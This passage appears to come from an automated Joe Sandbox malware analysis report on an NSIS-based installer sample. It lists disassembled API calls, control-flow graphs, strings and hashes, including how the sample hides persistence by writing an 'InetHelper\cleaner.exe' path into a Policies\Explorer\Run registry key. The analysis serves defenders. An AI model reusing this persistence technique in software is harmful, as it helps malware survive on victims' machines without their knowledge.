                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                              • String ID: 9
                                                                                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph: first block 406752-406772 (graph rendering not preserved)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph: first block 402598-4025aa (graph rendering not preserved)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",000000FF,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00002000,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                              • lstrlenA.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",000000FF,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00002000,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 3109718747-572866773
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 589 406943-406966 590 406970-406973 589->590 591 406968-40696b 589->591 593 406976-40697f 590->593 592 407390-407394 591->592 594 406985 593->594 595 40738d 593->595 596 406a31-406a35 594->596 597 406aa1-406aa5 594->597 598 40698c-406990 594->598 599 406acc-407173 594->599 595->592 600 4072e1-4072eb 596->600 601 406a3b-406a54 596->601 604 4072f0-4072fa 597->604 605 406aab-406abf 597->605 602 406996-4069a3 598->602 603 407378-40738b 598->603 610 407175-40718b 599->610 611 40718d-4071a3 599->611 600->603 607 406a57-406a5b 601->607 602->595 608 4069a9-4069ef 602->608 603->592 604->603 609 406ac2-406aca 605->609 607->596 613 406a5d-406a63 607->613 614 4069f1-4069f5 608->614 615 406a17-406a19 608->615 609->597 609->599 612 4071a6-4071ad 610->612 611->612 616 4071d4-4071e0 612->616 617 4071af-4071b3 612->617 618 406a65-406a6c 613->618 619 406a8d-406a9f 613->619 620 406a00-406a0e GlobalAlloc 614->620 621 4069f7-4069fa GlobalFree 614->621 622 406a27-406a2f 615->622 623 406a1b-406a25 615->623 616->593 624 407362-40736c 617->624 625 4071b9-4071d1 617->625 627 406a77-406a87 GlobalAlloc 618->627 628 406a6e-406a71 GlobalFree 618->628 619->609 620->595 629 406a14 620->629 621->620 622->607 623->622 623->623 624->603 625->616 627->595 627->619 628->627 629->615
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00406943
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 0-1897978588
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 630 4023e4-402415 call 402c41 * 2 call 402cd1 637 402ac5-402ad4 630->637 638 40241b-402425 630->638 639 402427-402434 call 402c41 lstrlenW 638->639 640 402438-40243b 638->640 639->640 642 40243d-40244e call 402c1f 640->642 643 40244f-402452 640->643 642->643 647 402463-402477 RegSetValueExW 643->647 648 402454-40245e call 4031d6 643->648 652 402479 647->652 653 40247c-40255d RegCloseKey 647->653 648->647 652->653 653->637
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 738 4031d6-4031e3 739 403201-40320a call 4032de 738->739 740 4031e5-4031fb SetFilePointer 738->740 743 403210-403223 call 405f61 739->743 744 4032d8-4032db 739->744 740->739 747 4032c8 743->747 748 403229-40323c call 4032de 743->748 750 4032ca-4032cb 747->750 752 403242-403245 748->752 753 4032d6 748->753 750->744 754 4032a4-4032aa 752->754 755 403247-40324a 752->755 753->744 756 4032ac 754->756 757 4032af-4032c6 ReadFile 754->757 755->753 758 403250 755->758 756->757 757->747 759 4032cd-4032d0 757->759 760 403255-40325f 758->760 759->753 761 403261 760->761 762 403266-403278 call 405f61 760->762 761->762 762->747 765 40327a-403281 call 405f90 762->765 767 403286-403288 765->767 768 4032a0-4032a2 767->768 769 40328a-40329c 767->769 768->750 769->760 770 40329e 769->770 770->753
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID: *:o
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 771 405f0d-405f19 772 405f1a-405f4e GetTickCount GetTempFileNameW 771->772 773 405f50-405f52 772->773 774 405f5d-405f5f 772->774 773->772 775 405f54 773->775 776 405f57-405f5a 774->776 775->776
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,004C1000,004034A3,004D1000,004D5000,004D5000,004D5000,004D5000,004D5000,74DF3420,004036EF), ref: 00405F46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                                              • Opcode ID: 8941ac05e4937e204e88b6b93cbbbbf1e6cab01e5c2f1d465c17e9c6e72d0440
                                                                                                                                                                                                              • Instruction ID: 7eb9064dadea35cbfc58acd36067de01cdd5d52a4e03f37d51203587584f4729
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8941ac05e4937e204e88b6b93cbbbbf1e6cab01e5c2f1d465c17e9c6e72d0440
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86E012B0610209BFEB00AFA0ED49F7B7AACFB08204F008921BD00F2191D774A9148A68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00401BE7
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401BF9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                              • String ID: InetHelper
                                                                                                                                                                                                              • API String ID: 3394109436-2767297512
                                                                                                                                                                                                              • Opcode ID: 176a51b4a66ca6db00c120fdfff2a52918b74a80b70c450353fe484a1e272d38
                                                                                                                                                                                                              • Instruction ID: 2224cfe726421d4168c30344d3cbfba70e659b3895da8488867bc6a87a7a29a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 176a51b4a66ca6db00c120fdfff2a52918b74a80b70c450353fe484a1e272d38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5321EB72A00200ABDB10EF95CEC49DE73A4AB543187A4403BF506F32D1DB78E891CB6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405EB9: GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                                • Part of subcall function 00405EB9: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405ED2
                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405C94), ref: 00405ACD
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000000,00405C94), ref: 00405AD5
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405AED
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                                                                                              • Opcode ID: ee26814d0e89ccba1e58ecbc8b5a308cd0754c8ce938ef3c5221310ac7d33209
                                                                                                                                                                                                              • Instruction ID: 2750ea62591d09886f88fd119c0b0bc2019991ac89723f17ff6745a253c15028
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee26814d0e89ccba1e58ecbc8b5a308cd0754c8ce938ef3c5221310ac7d33209
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE0E531305A9056C7106B759A48B5B3AD8EF8E324F060B3BF592F11C0CBB845068FBD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406899
                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 004068A6
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2567322000-0
                                                                                                                                                                                                              • Opcode ID: 058b86cb8c5b11f12917a2041960eef3384f514dab9b8efc3c465a5e278299d9
                                                                                                                                                                                                              • Instruction ID: 54c41dae5f15cf301fa098fb72fed04142b8325bbdcb3ac6ef2f4a5ab910b3b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 058b86cb8c5b11f12917a2041960eef3384f514dab9b8efc3c465a5e278299d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55E09232600118BBDB00AF44DD02E9E7B6ADB44754F158037BA05B61A1D6B19E21EAA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405A14: ShellExecuteExW.SHELL32(?), ref: 00405A23
                                                                                                                                                                                                                • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                                • Part of subcall function 00406873: GetExitCodeProcess.KERNELBASE(?,?), ref: 004068A6
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 4215836453-2766056989
                                                                                                                                                                                                              • Opcode ID: 574abbdadf194fab47be470e7fbaa0850e4f7391dff1c4efc7d36e0ba334349f
                                                                                                                                                                                                              • Instruction ID: e7e9fe02224fa80e8acc3d91e69a95aa357927643f4877ada07b0f7c2baa17a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 574abbdadf194fab47be470e7fbaa0850e4f7391dff1c4efc7d36e0ba334349f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01112B75E142049BDB10EFB9DA89A8DBBB0AB48304F24453AE555F72D2DBB888419F18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004266D0,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,0040345A,0040A230,0040A230,0040335E,004266D0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00405F61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 2738559852-1897978588
                                                                                                                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                              • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00423D35,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,004033DE,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,00423D35,004266D0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00405F90
                                                                                                                                                                                                              Memory Dump Source
